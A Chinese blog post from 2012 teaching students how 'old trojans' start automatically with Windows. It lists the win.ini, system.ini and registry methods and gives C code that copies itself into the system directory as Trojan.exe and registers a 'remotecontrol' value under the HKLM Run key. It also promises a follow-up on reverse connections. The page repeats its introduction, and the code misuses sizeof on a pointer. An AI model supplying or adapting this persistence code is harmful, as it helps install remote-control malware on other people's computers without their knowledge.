实现“老木马”关键技术之一---------自启动
2012-10-15 19:24
351 查看
好久没写篇文章了,这么长时间学的知识都零零碎碎的。不知道该怎么总结下。今天写了个自启动的代码,其实没啥含量就是几个api,就完了,还是用C写的,就还是写给学C的大一大二学弟们看看。C还是能处理事情的,这其实只是个实现在启动的代码,是以前的老木马才使用的方法了,杀毒软件会拦截得到的,所以要用最新的方法才行,但是最新的方法呢,这个·········我是不知道了
木马中的自启动呢,就是随电脑启动而启动。自启动方式目前俺就知道3个,一个是修改win.ini配置文件,一个是修改system.ini配置文件,还有一个就是修改注册表。好像直接把程序设置到启动组也可以哦······
下面给出的是修改注册表的代码·····
编译环境VC6.0
编译系统xp sp3
程序运行后
看截图吧
实现起来不是很难吧,呵呵·····下次会给大家分享反向链接如何实现的·········
木马中的自启动呢,就是随电脑启动而启动。自启动方式目前俺就知道3个,一个是修改win.ini配置文件,一个是修改system.ini配置文件,还有一个就是修改注册表。好像直接把程序设置到启动组也可以哦······
下面给出的是修改注册表的代码·····
编译环境VC6.0
编译系统xp sp3
#include <windows.h> #include <stdio.h> void main() { char * temp = NULL; char TempPath[MAX_PATH] = ""; char * ChangeName = "\\Trojan.exe"; //确定windows系统目录 GetSystemDirectory(TempPath,MAX_PATH); temp = TempPath; temp = strncat(temp,ChangeName,sizeof(ChangeName)); int len = strlen(temp); // 把程序复制到系统目录并更名为“Trojan.exe¡” CopyFile("autoboot.exe",temp,FALSE); //第三个参数是当目录中有同名文件的话,会直接覆盖,相反则不会。 HKEY hKey; // 设置注册表中的相关路径 LPCTSTR SetData = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; if (0 == RegOpenKeyEx(HKEY_LOCAL_MACHINE,SetData,0,KEY_WRITE,&hKey)) { if (!(RegSetValueEx(hKey,"remotecontrol",NULL,REG_SZ,LPBYTE(temp),len))) //第二个参数是设置值的名字 { exit(-1); } } RegCloseKey(hKey); }
程序运行后
看截图吧
实现起来不是很难吧,呵呵·····下次会给大家分享反向链接如何实现的·········
相关文章推荐
- C# 实现远程控制软件的关键技术
- 负载均衡--大型在线系统实现的关键(再谈QQ游戏百万人在线的技术实现)
- 关键技术之单机爬虫的实现(2)---多线程?
- 人机协作机器人关键技术之零力控制实现方案对比分析
- 汇编实现木马生成技术
- 商务智能系统实现数据管理的关键技术
- Box2D实现Super Mario之关键技术分析——mario下蹲通过低矮障碍物
- Cobub无码埋点关键技术的实现
- 详解网络数字电视的实现方法与关键技术
- Win32全局钩子在Delphi下实现的关键技术
- 分布式视频会议系统的关键技术及实现
- 推送的架构及关键技术实现
- 屏幕取词技术实现原理与关键源码
- 负载均衡--大型在线系统实现的关键(上篇)(再谈QQ游戏百万人在线的技术实现)
- NDIS HOOK 防火墙实现关键技术
- Win32全局钩子在Delphi下实现的关键技术
- C#实现软键盘的几个关键技术介绍
- 用Visual C++实现远程线程嵌入木马技术
- Cluster技术实现关键技术应用
- 详解网络数字电视的实现方法与关键技术